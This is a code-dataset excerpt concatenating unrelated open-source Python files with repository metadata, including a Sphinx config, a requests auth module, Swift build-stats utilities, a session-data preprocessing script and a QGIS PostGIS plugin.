# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
#htmlhelp_basename = 'neutrondoc'
# -- Options for LaTeX output ------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author,
# documentclass [howto/manual]).
latex_documents = [
('index', 'doc-neutron-vpnaas.tex', u'Neutron VPN-as-a-Service Documentation',
u'Neutron development team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Disable usage of xindy https://bugzilla.redhat.com/show_bug.cgi?id=1643664
latex_use_xindy = False
latex_domain_indices = False
latex_elements = {
'extraclassoptions': 'openany,oneside',
'makeindex': '',
'printindex': '',
'preamble': r'\setcounter{tocdepth}{3}',
}
# -- Options for openstackdocstheme -------------------------------------------
openstackdocs_repo_name = 'openstack/neutron-vpnaas'
openstackdocs_pdf_link = True
openstackdocs_auto_name = False
openstackdocs_bug_project = 'neutron'
openstackdocs_bug_tag = 'doc'
# -- Options for oslo_config.sphinxconfiggen ---------------------------------
_config_generator_config_files = [
'vpn_agent.ini',
'neutron_vpnaas.conf',
]
def _get_config_generator_config_definition(conf):
config_file_path = '../../etc/oslo-config-generator/%s' % conf
# oslo_config.sphinxconfiggen appends '.conf.sample' to the filename,
    # strip the file extension (.conf or .ini).
output_file_path = '_static/config_samples/%s' % conf.rsplit('.', 1)[0]
return (config_file_path, output_file_path)
config_generator_config_file = [
_get_config_generator_config_definition(conf)
for conf in _config_generator_config_files
]
# -- Options for oslo_policy.sphinxpolicygen ---------------------------------
policy_generator_config_file = '../../etc/oslo-policy-generator/policy.conf'
sample_policy_basename = '_static/neutron-vpnaas'
|
openstack/neutron-vpnaas
|
doc/source/conf.py
|
Python
|
apache-2.0
| 8,813 | 0.003858 |
# -*- coding: utf8 -*-
import logging
import math
from Graphx import graphx
from GameEngine.GameObjects.gameObjectBehaviour import GameObjectBehaviour
from Brains.human import HumanBrain
from conf import conf
class CarBehaviour(GameObjectBehaviour):
brainTypes = {
'human': HumanBrain
}
"""
Behaviour of the car. It handles the car at its current position.
"""
def __init__(self, brainType, ruleChecker, model):
"""
Initialize a new Behaviour object for the car.
It needs a brain which will take the actual decisions of the actions,
and the model that holds the state history
"""
super(CarBehaviour, self).__init__(model)
self._brain = CarBehaviour.brainTypes[brainType](model)
self._ruleChecker = ruleChecker
self._newVelocity = None
self._newPosition = None
self._newHeading = None
self._actions = {
'accelerate': self.accelerate,
'break': self.breaks,
'turnRight': self.turnRight,
'turnLeft': self.turnLeft,
'halt': self.halt
}
def move(self):
"""
set the new position of the car using the current velocity and
the current heading
"""
self._newPosition = \
(self._model.position[0] +
self._newVelocity * self._model.headingVector[0],
self._model.position[1] +
self._newVelocity * self._model.headingVector[1])
def halt(self):
"""
If this action is called at this turn, the velocity and the heading
stay the same
"""
self._newVelocity = self._model.velocity
self._newHeading = self._model.headingAngle
self.move()
def accelerate(self):
"""
Increase the velocity by the car's acceleration
If max_speed is reached, the car simply keep its current speed.
The heading does not change
"""
self._newVelocity = \
self._model.velocity + self._model.constant('acceleration')
if self._newVelocity > self._model.constant('max_speed'):
self._newVelocity = self._model.constant('max_speed')
self._newHeading = self._model.headingAngle
self.move()
def breaks(self):
"""
Breaks using the car's break constant.
If the car is already stopped, nothing happen.
The heading does not change
"""
self._newVelocity = \
self._model.velocity - self._model.constant('break')
if self._newVelocity < 0:
self._newVelocity = 0
self._newHeading = self._model.headingAngle
self.move()
def turnRight(self):
"""
Turn right relatively to the car's heading using the car's maniability.
The velocity does not change
"""
self._newHeading = self._model.headingAngle - \
self._model.constant('maniability')
self._newVelocity = self._model.velocity
self.move()
def turnLeft(self):
"""
Turn left relatively to the car's heading using the car's maniability
The velocity does not change
"""
self._newHeading = self._model.headingAngle + \
self._model.constant('maniability')
self._newVelocity = self._model.velocity
self.move()
def update(self, stateManager):
"""
Use the brain the take the decision about what is the next action, then
update the model according to what has been decided.
"""
decision = self._brain.decision()
self._actions[decision]()
self._model.rotate(self._newHeading)
self._model.velocity = self._newVelocity
self._model.position = self._newPosition
# self._ruleChecker.check(self._model.getCurrentState(),
# self._model.getPreviousState())
|
Hiestaa/cognitive-racer
|
GameEngine/GameObjects/Car/behaviour.py
|
Python
|
lgpl-3.0
| 3,344 | 0.031998 |
#!/usr/bin/env python3
# Given a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.
# Basically, the deletion can be divided into two stages:
# Search for a node to remove.
# If the node is found, delete the node.
# Note: Time complexity should be O(height of tree).
# Example:
# root = [5,3,6,2,4,null,7]
# key = 3
# 5
# / \
# 3 6
# / \ \
# 2 4 7
# Given key to delete is 3. So we find the node with value 3 and delete it.
# One valid answer is [5,4,6,2,null,null,7], shown in the following BST.
# 5
# / \
# 4 6
# / \
# 2 7
# Another valid answer is [5,2,6,null,4,null,7].
# 5
# / \
# 2 6
# \ \
# 4 7
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from tree import *
class Solution:
def deleteNode(self, root: TreeNode, key: int) -> TreeNode:
if root == None:
return None
if key < root.val:
root.left = self.deleteNode(root.left, key)
elif key > root.val:
root.right = self.deleteNode(root.right, key)
else:
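            # Key found: if there is no left subtree, the right child simply
            # replaces this node; otherwise the largest node of the left
            # subtree (the in-order predecessor) becomes the new root after
            # being detached from the left subtree.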
node = root
if node.left == None:
return node.right
root = self.getmax(node.left)
# print(f'find new root: {root.val}')
root.left = self.deletemax(node.left)
root.right = node.right
return root
def getmax(self, root):
if root == None or root.right == None:
return root
        return self.getmax(root.right)
def deletemax(self, root):
if root == None:
return None
if root.right == None:
return root.left
        root.right = self.deletemax(root.right)
return root
nodeString = '[5,3,6,2,4,null,7]'
sol = Solution()
root = treeBuilder(nodeString)
print('Tree after deleting key 3:')
traverse(sol.deleteNode(root, 3))
|
eroicaleo/LearningPython
|
interview/leet/450_Delete_Node_in_a_BST.py
|
Python
|
mit
| 2,059 | 0.004371 |
# -*- coding: utf-8 -*-
"""
requests.auth
~~~~~~~~~~~~~
This module contains the authentication handlers for Requests.
"""
import os
import re
import time
import hashlib
from base64 import b64encode
from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
def _basic_auth_str(username, password):
"""Returns a Basic Auth string."""
return 'Basic ' + b64encode(('%s:%s' % (username, password)).encode('latin1')).strip().decode('latin1')
class AuthBase(object):
"""Base class that all auth implementations derive from"""
def __call__(self, r):
raise NotImplementedError('Auth hooks must be callable.')
class HTTPBasicAuth(AuthBase):
"""Attaches HTTP Basic Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
def __call__(self, r):
r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPProxyAuth(HTTPBasicAuth):
"""Attaches HTTP Proxy Authentication to a given Request object."""
def __call__(self, r):
r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPDigestAuth(AuthBase):
"""Attaches HTTP Digest Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
self.last_nonce = ''
self.nonce_count = 0
self.chal = {}
self.pos = None
def build_digest_header(self, method, url):
realm = self.chal['realm']
nonce = self.chal['nonce']
qop = self.chal.get('qop')
algorithm = self.chal.get('algorithm')
opaque = self.chal.get('opaque')
if algorithm is None:
_algorithm = 'MD5'
else:
_algorithm = algorithm.upper()
# lambdas assume digest modules are imported at the top level
if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
def md5_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8
elif _algorithm == 'SHA':
def sha_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.sha1(x).hexdigest()
hash_utf8 = sha_utf8
KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
if hash_utf8 is None:
return None
# XXX not implemented yet
entdig = None
p_parsed = urlparse(url)
path = p_parsed.path
if p_parsed.query:
path += '?' + p_parsed.query
A1 = '%s:%s:%s' % (self.username, realm, self.password)
A2 = '%s:%s' % (method, path)
HA1 = hash_utf8(A1)
HA2 = hash_utf8(A2)
if nonce == self.last_nonce:
self.nonce_count += 1
else:
self.nonce_count = 1
ncvalue = '%08x' % self.nonce_count
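        # Build the client nonce from the nonce count, the server nonce, the
        # current time and 8 random bytes, then SHA-1 it and keep the first
        # 16 hex characters.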
s = str(self.nonce_count).encode('utf-8')
s += nonce.encode('utf-8')
s += time.ctime().encode('utf-8')
s += os.urandom(8)
cnonce = (hashlib.sha1(s).hexdigest()[:16])
noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, HA2)
if _algorithm == 'MD5-SESS':
HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
if qop is None:
respdig = KD(HA1, "%s:%s" % (nonce, HA2))
elif qop == 'auth' or 'auth' in qop.split(','):
respdig = KD(HA1, noncebit)
else:
# XXX handle auth-int.
return None
self.last_nonce = nonce
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (self.username, realm, nonce, path, respdig)
if opaque:
base += ', opaque="%s"' % opaque
if algorithm:
base += ', algorithm="%s"' % algorithm
if entdig:
base += ', digest="%s"' % entdig
if qop:
base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return 'Digest %s' % (base)
def handle_401(self, r, **kwargs):
"""Takes the given response and tries digest-auth, if needed."""
if self.pos is not None:
# Rewind the file position indicator of the body to where
# it was to resend the request.
r.request.body.seek(self.pos)
num_401_calls = getattr(self, 'num_401_calls', 1)
        s_auth = r.headers.get('www-authenticate', '')
if 'digest' in s_auth.lower() and num_401_calls < 2:
setattr(self, 'num_401_calls', num_401_calls + 1)
pat = re.compile(r'digest ', flags=re.IGNORECASE)
self.chal = parse_dict_header(pat.sub('', s_auth, count=1))
# Consume content and release the original connection
# to allow our new request to reuse the same one.
r.content
r.raw.release_conn()
prep = r.request.copy()
extract_cookies_to_jar(prep._cookies, r.request, r.raw)
prep.prepare_cookies(prep._cookies)
prep.headers['Authorization'] = self.build_digest_header(
prep.method, prep.url)
_r = r.connection.send(prep, **kwargs)
_r.history.append(r)
_r.request = prep
return _r
setattr(self, 'num_401_calls', 1)
return r
def __call__(self, r):
# If we have a saved nonce, skip the 401
if self.last_nonce:
r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
try:
self.pos = r.body.tell()
except AttributeError:
pass
r.register_hook('response', self.handle_401)
return r
|
Botong/songtaste
|
lib/requests/auth.py
|
Python
|
apache-2.0
| 6,120 | 0.000817 |
#!/usr/bin/python
#
# ==-- jobstats - support for reading the contents of stats dirs --==#
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014-2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ==------------------------------------------------------------------------==#
#
# This file contains subroutines for loading object-representations of one or
# more directories generated by `swiftc -stats-output-dir`.
import datetime
import itertools
import json
import os
import random
import re
class JobStats(object):
"""Object holding the stats of a single job run during a compilation,
corresponding to a single JSON file produced by a single job process
passed -stats-output-dir."""
def __init__(self, jobkind, jobid, module, start_usec, dur_usec,
jobargs, stats):
self.jobkind = jobkind
self.jobid = jobid
self.module = module
self.start_usec = start_usec
self.dur_usec = dur_usec
self.jobargs = jobargs
self.stats = stats
def is_driver_job(self):
"""Return true iff self measures a driver job"""
return self.jobkind == 'driver'
def is_frontend_job(self):
"""Return true iff self measures a frontend job"""
return self.jobkind == 'frontend'
def driver_jobs_ran(self):
"""Return the count of a driver job's ran sub-jobs"""
assert(self.is_driver_job())
return self.stats.get("Driver.NumDriverJobsRun", 0)
def driver_jobs_skipped(self):
"""Return the count of a driver job's skipped sub-jobs"""
assert(self.is_driver_job())
return self.stats.get("Driver.NumDriverJobsSkipped", 0)
def driver_jobs_total(self):
"""Return the total count of a driver job's ran + skipped sub-jobs"""
assert(self.is_driver_job())
return self.driver_jobs_ran() + self.driver_jobs_skipped()
def merged_with(self, other, merge_by="sum"):
"""Return a new JobStats, holding the merger of self and other"""
merged_stats = {}
ops = {"sum": lambda a, b: a + b,
# Because 0 is also a sentinel on counters we do a modified
# "nonzero-min" here. Not ideal but best we can do.
"min": lambda a, b: (min(a, b)
if a != 0 and b != 0
else max(a, b)),
"max": lambda a, b: max(a, b)}
op = ops[merge_by]
for k, v in self.stats.items() + other.stats.items():
if k in merged_stats:
merged_stats[k] = op(v, merged_stats[k])
else:
merged_stats[k] = v
merged_kind = self.jobkind
if other.jobkind != merged_kind:
merged_kind = "<merged>"
merged_module = self.module
if other.module != merged_module:
merged_module = "<merged>"
merged_start = min(self.start_usec, other.start_usec)
merged_end = max(self.start_usec + self.dur_usec,
other.start_usec + other.dur_usec)
merged_dur = merged_end - merged_start
return JobStats(merged_kind, random.randint(0, 1000000000),
merged_module, merged_start, merged_dur,
self.jobargs + other.jobargs, merged_stats)
def prefixed_by(self, prefix):
prefixed_stats = dict([((prefix + "." + k), v)
for (k, v) in self.stats.items()])
return JobStats(self.jobkind, random.randint(0, 1000000000),
self.module, self.start_usec, self.dur_usec,
self.jobargs, prefixed_stats)
def divided_by(self, n):
divided_stats = dict([(k, v / n)
for (k, v) in self.stats.items()])
return JobStats(self.jobkind, random.randint(0, 1000000000),
self.module, self.start_usec, self.dur_usec,
self.jobargs, divided_stats)
def incrementality_percentage(self):
"""Assuming the job is a driver job, return the amount of
jobs that actually ran, as a percentage of the total number."""
assert(self.is_driver_job())
ran = self.driver_jobs_ran()
total = self.driver_jobs_total()
return round((float(ran) / float(total)) * 100.0, 2)
def to_catapult_trace_obj(self):
"""Return a JSON-formattable object fitting chrome's
'catapult' trace format"""
return {"name": self.module,
"cat": self.jobkind,
"ph": "X", # "X" == "complete event"
"pid": self.jobid,
"tid": 1,
"ts": self.start_usec,
"dur": self.dur_usec,
"args": self.jobargs}
def start_timestr(self):
"""Return a formatted timestamp of the job's start-time"""
t = datetime.datetime.fromtimestamp(self.start_usec / 1000000.0)
return t.strftime("%Y-%m-%d %H:%M:%S")
def end_timestr(self):
"""Return a formatted timestamp of the job's end-time"""
t = datetime.datetime.fromtimestamp((self.start_usec +
self.dur_usec) / 1000000.0)
return t.strftime("%Y-%m-%d %H:%M:%S")
def pick_lnt_metric_suffix(self, metric_name):
"""Guess an appropriate LNT metric type for a given metric name"""
if "BytesOutput" in metric_name:
return "code_size"
if "RSS" in metric_name or "BytesAllocated" in metric_name:
return "mem"
return "compile"
def to_lnt_test_obj(self, args):
"""Return a JSON-formattable object fitting LNT's 'submit' format"""
run_info = {
"run_order": str(args.lnt_order),
"tag": str(args.lnt_tag),
}
run_info.update(dict(args.lnt_run_info))
stats = self.stats
return {
"Machine":
{
"Name": args.lnt_machine,
"Info": dict(args.lnt_machine_info)
},
"Run":
{
"Start Time": self.start_timestr(),
"End Time": self.end_timestr(),
"Info": run_info
},
"Tests":
[
{
"Data": [v],
"Info": {},
"Name": "%s.%s.%s.%s" % (args.lnt_tag, self.module,
k, self.pick_lnt_metric_suffix(k))
}
for (k, v) in stats.items()
]
}
AUXPATSTR = (r"(?P<module>[^-]+)-(?P<input>[^-]+)-(?P<triple>[^-]+)" +
r"-(?P<out>[^-]*)-(?P<opt>[^-]+)")
AUXPAT = re.compile(AUXPATSTR)
TIMERPATSTR = (r"time\.swift-(?P<jobkind>\w+)\." + AUXPATSTR +
"\.(?P<timerkind>\w+)$")
TIMERPAT = re.compile(TIMERPATSTR)
FILEPATSTR = (r"^stats-(?P<start>\d+)-swift-(?P<kind>\w+)-" +
AUXPATSTR +
r"-(?P<pid>\d+)(-.*)?.json$")
FILEPAT = re.compile(FILEPATSTR)
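# AUXPAT captures the module/input/triple/output/optimization fields embedded
# in swiftc's stats names; TIMERPAT matches per-job timer keys inside a stats
# file, and FILEPAT matches the stats JSON filenames themselves.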
def match_auxpat(s):
m = AUXPAT.match(s)
if m is not None:
return m.groupdict()
else:
return None
def match_timerpat(s):
m = TIMERPAT.match(s)
if m is not None:
return m.groupdict()
else:
return None
def match_filepat(s):
m = FILEPAT.match(s)
if m is not None:
return m.groupdict()
else:
return None
def load_stats_dir(path, select_module=[], select_stat=[],
exclude_timers=False, merge_timers=False, **kwargs):
"""Loads all stats-files found in path into a list of JobStats objects"""
jobstats = []
sre = re.compile('.*' if len(select_stat) == 0 else
'|'.join(select_stat))
for root, dirs, files in os.walk(path):
for f in files:
mg = match_filepat(f)
if not mg:
continue
# NB: "pid" in fpat is a random number, not unix pid.
jobkind = mg['kind']
jobid = int(mg['pid'])
start_usec = int(mg['start'])
module = mg["module"]
if len(select_module) != 0 and module not in select_module:
continue
jobargs = [mg["input"], mg["triple"], mg["out"], mg["opt"]]
with open(os.path.join(root, f)) as fp:
j = json.load(fp)
dur_usec = 1
stats = dict()
for (k, v) in j.items():
if sre.search(k) is None:
continue
if k.startswith('time.') and exclude_timers:
continue
tm = match_timerpat(k)
if tm:
v = int(1000000.0 * float(v))
if tm['jobkind'] == jobkind and \
tm['timerkind'] == 'wall':
dur_usec = v
if merge_timers:
k = "time.swift-%s.%s" % (tm['jobkind'],
tm['timerkind'])
stats[k] = v
e = JobStats(jobkind=jobkind, jobid=jobid,
module=module, start_usec=start_usec,
dur_usec=dur_usec, jobargs=jobargs,
stats=stats)
jobstats.append(e)
return jobstats
def merge_all_jobstats(jobstats, select_module=[], group_by_module=False,
merge_by="sum", divide_by=1, **kwargs):
"""Does a pairwise merge of the elements of list of jobs"""
m = None
if len(select_module) > 0:
jobstats = filter(lambda j: j.module in select_module, jobstats)
if group_by_module:
def keyfunc(j):
return j.module
jobstats = list(jobstats)
jobstats.sort(key=keyfunc)
prefixed = []
for mod, group in itertools.groupby(jobstats, keyfunc):
groupmerge = merge_all_jobstats(group, merge_by=merge_by,
divide_by=divide_by)
prefixed.append(groupmerge.prefixed_by(mod))
jobstats = prefixed
for j in jobstats:
if m is None:
m = j
else:
m = m.merged_with(j, merge_by=merge_by)
if m is None:
return m
return m.divided_by(divide_by)
|
zisko/swift
|
utils/jobstats/jobstats.py
|
Python
|
apache-2.0
| 10,591 | 0.000189 |
from models import db
from models.Post import Post
class PostFile(db.Model):
__tablename__ = 'PostFile'
Id = db.Column(db.Integer, primary_key = True)
Post = db.Column(db.Integer, db.ForeignKey(Post.Id))
FileName = db.Column(db.String(128))
def __init__(self, post, file):
self.Post = post
self.FileName = file
|
goors/flask-microblog
|
models/PostFile.py
|
Python
|
apache-2.0
| 335 | 0.026866 |
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 25 16:20:12 2015
@author: Balázs Hidasi
@lastmodified: Loreto Parisi (loretoparisi at gmail dot com)
"""
import sys
import os
import numpy as np
import pandas as pd
import datetime as dt
# To redirect output to file
class Logger(object):
def __init__(self, filename="Default.log"):
self.terminal = sys.stdout
self.log = open(filename, "a")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
pass
sys.stdout = Logger(os.environ['HOME'] + '/theano.log')
PATH_TO_ORIGINAL_DATA = os.environ['HOME'] + '/'
PATH_TO_PROCESSED_DATA = os.environ['HOME'] + '/'
data = pd.read_csv(PATH_TO_ORIGINAL_DATA + 'yoochoose-clicks.dat', sep=',', header=None, usecols=[0,1,2], dtype={0:np.int32, 1:str, 2:np.int64})
data.columns = ['SessionId', 'TimeStr', 'ItemId']
data['Time'] = data.TimeStr.apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%dT%H:%M:%S.%fZ').timestamp()) #This is not UTC. It does not really matter.
del(data['TimeStr'])
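# Filter the click log: keep sessions with more than one event and items that
# occur at least 5 times, then drop sessions that fall below 2 events again.
# The final day (86400 s) of activity becomes the test set; the preceding day
# is later split off from the training data as a validation set.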
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>1].index)]
item_supports = data.groupby('ItemId').size()
data = data[np.in1d(data.ItemId, item_supports[item_supports>=5].index)]
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>=2].index)]
tmax = data.Time.max()
session_max_times = data.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_test = session_max_times[session_max_times >= tmax-86400].index
train = data[np.in1d(data.SessionId, session_train)]
test = data[np.in1d(data.SessionId, session_test)]
test = test[np.in1d(test.ItemId, train.ItemId)]
tslength = test.groupby('SessionId').size()
test = test[np.in1d(test.SessionId, tslength[tslength>=2].index)]
print('Full train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train), train.SessionId.nunique(), train.ItemId.nunique()))
train.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_full.txt', sep='\t', index=False)
print('Test set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(test), test.SessionId.nunique(), test.ItemId.nunique()))
test.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_test.txt', sep='\t', index=False)
tmax = train.Time.max()
session_max_times = train.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_valid = session_max_times[session_max_times >= tmax-86400].index
train_tr = train[np.in1d(train.SessionId, session_train)]
valid = train[np.in1d(train.SessionId, session_valid)]
valid = valid[np.in1d(valid.ItemId, train_tr.ItemId)]
tslength = valid.groupby('SessionId').size()
valid = valid[np.in1d(valid.SessionId, tslength[tslength>=2].index)]
print('Train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train_tr), train_tr.SessionId.nunique(), train_tr.ItemId.nunique()))
train_tr.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_tr.txt', sep='\t', index=False)
print('Validation set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(valid), valid.SessionId.nunique(), valid.ItemId.nunique()))
valid.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_valid.txt', sep='\t', index=False)
|
loretoparisi/docker
|
theano/rsc15/preprocess.py
|
Python
|
mit
| 3,325 | 0.008724 |
a = [1 2 3]
|
smmribeiro/intellij-community
|
python/testData/psi/MissingListSeparators.py
|
Python
|
apache-2.0
| 11 | 0.090909 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import str
from builtins import map
from builtins import range
# this will disable the dbplugin if the connector raise an ImportError
from .connector import PostGisDBConnector
from qgis.PyQt.QtCore import QSettings, Qt, QRegExp
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction, QApplication, QMessageBox
from qgis.gui import QgsMessageBar
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, Database, Schema, Table, VectorTable, RasterTable, \
TableField, TableConstraint, TableIndex, TableTrigger, TableRule
import re
from . import resources_rc # NOQA
def classFactory():
return PostGisDBPlugin
class PostGisDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QIcon(":/db_manager/postgis/icon")
@classmethod
def typeName(self):
return 'postgis'
@classmethod
def typeNameString(self):
return 'PostGIS'
@classmethod
def providerName(self):
return 'postgres'
@classmethod
def connectionSettingsKey(self):
return '/PostgreSQL/connections'
def databasesFactory(self, connection, uri):
return PGDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QSettings()
settings.beginGroup(u"/%s/%s" % (self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(self.tr('There is no defined database connection "%s".') % conn_name)
from qgis.core import QgsDataSourceUri
uri = QgsDataSourceUri()
settingsList = ["service", "host", "port", "database", "username", "password", "authcfg"]
service, host, port, database, username, password, authcfg = [settings.value(x, "", type=str) for x in settingsList]
useEstimatedMetadata = settings.value("estimatedMetadata", False, type=bool)
sslmode = settings.value("sslmode", QgsDataSourceUri.SslPrefer, type=int)
settings.endGroup()
if hasattr(authcfg, 'isNull') and authcfg.isNull():
authcfg = ''
if service:
uri.setConnection(service, database, username, password, sslmode, authcfg)
else:
uri.setConnection(host, port, database, username, password, sslmode, authcfg)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
try:
return self.connectToUri(uri)
except ConnectionError:
return False
class PGDatabase(Database):
def __init__(self, connection, uri):
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return PostGisDBConnector(uri)
def dataTablesFactory(self, row, db, schema=None):
return PGTable(row, db, schema)
def info(self):
from .info_model import PGDatabaseInfo
return PGDatabaseInfo(self)
def vectorTablesFactory(self, row, db, schema=None):
return PGVectorTable(row, db, schema)
def rasterTablesFactory(self, row, db, schema=None):
return PGRasterTable(row, db, schema)
def schemasFactory(self, row, db):
return PGSchema(row, db)
def sqlResultModel(self, sql, parent):
from .data_model import PGSqlResultModel
return PGSqlResultModel(self, sql, parent)
def registerDatabaseActions(self, mainWindow):
Database.registerDatabaseActions(self, mainWindow)
# add a separator
separator = QAction(self)
separator.setSeparator(True)
mainWindow.registerAction(separator, self.tr("&Table"))
action = QAction(self.tr("Run &Vacuum Analyze"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runVacuumAnalyzeActionSlot)
action = QAction(self.tr("Run &Refresh Materialized View"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runRefreshMaterializedViewSlot)
def runVacuumAnalyzeActionSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, Table) or item.isView:
parent.infoBar.pushMessage(self.tr("Select a table for vacuum analyze."), QgsMessageBar.INFO,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runVacuumAnalyze()
def runRefreshMaterializedViewSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, PGTable) or item._relationType != 'm':
parent.infoBar.pushMessage(self.tr("Select a materialized view for refresh."), QgsMessageBar.INFO,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runRefreshMaterializedView()
def hasLowercaseFieldNamesOption(self):
return True
class PGSchema(Schema):
def __init__(self, row, db):
Schema.__init__(self, db)
self.oid, self.name, self.owner, self.perms, self.comment = row
class PGTable(Table):
def __init__(self, row, db, schema=None):
Table.__init__(self, db, schema)
self.name, schema_name, self._relationType, self.owner, self.estimatedRowCount, self.pages, self.comment = row
self.isView = self._relationType in set(['v', 'm'])
self.estimatedRowCount = int(self.estimatedRowCount)
def runVacuumAnalyze(self):
self.aboutToChange.emit()
self.database().connector.runVacuumAnalyze((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runRefreshMaterializedView(self):
self.aboutToChange.emit()
self.database().connector.runRefreshMaterializedView((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runAction(self, action):
action = str(action)
if action.startswith("vacuumanalyze/"):
if action == "vacuumanalyze/run":
self.runVacuumAnalyze()
return True
elif action.startswith("rule/"):
parts = action.split('/')
rule_name = parts[1]
rule_action = parts[2]
msg = u"Do you want to %s rule %s?" % (rule_action, rule_name)
QApplication.restoreOverrideCursor()
try:
if QMessageBox.question(None, self.tr("Table rule"), msg,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.No:
return False
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
if rule_action == "delete":
self.aboutToChange.emit()
self.database().connector.deleteTableRule(rule_name, (self.schemaName(), self.name))
self.refreshRules()
return True
elif action.startswith("refreshmaterializedview/"):
if action == "refreshmaterializedview/run":
self.runRefreshMaterializedView()
return True
return Table.runAction(self, action)
def tableFieldsFactory(self, row, table):
return PGTableField(row, table)
def tableConstraintsFactory(self, row, table):
return PGTableConstraint(row, table)
def tableIndexesFactory(self, row, table):
return PGTableIndex(row, table)
def tableTriggersFactory(self, row, table):
return PGTableTrigger(row, table)
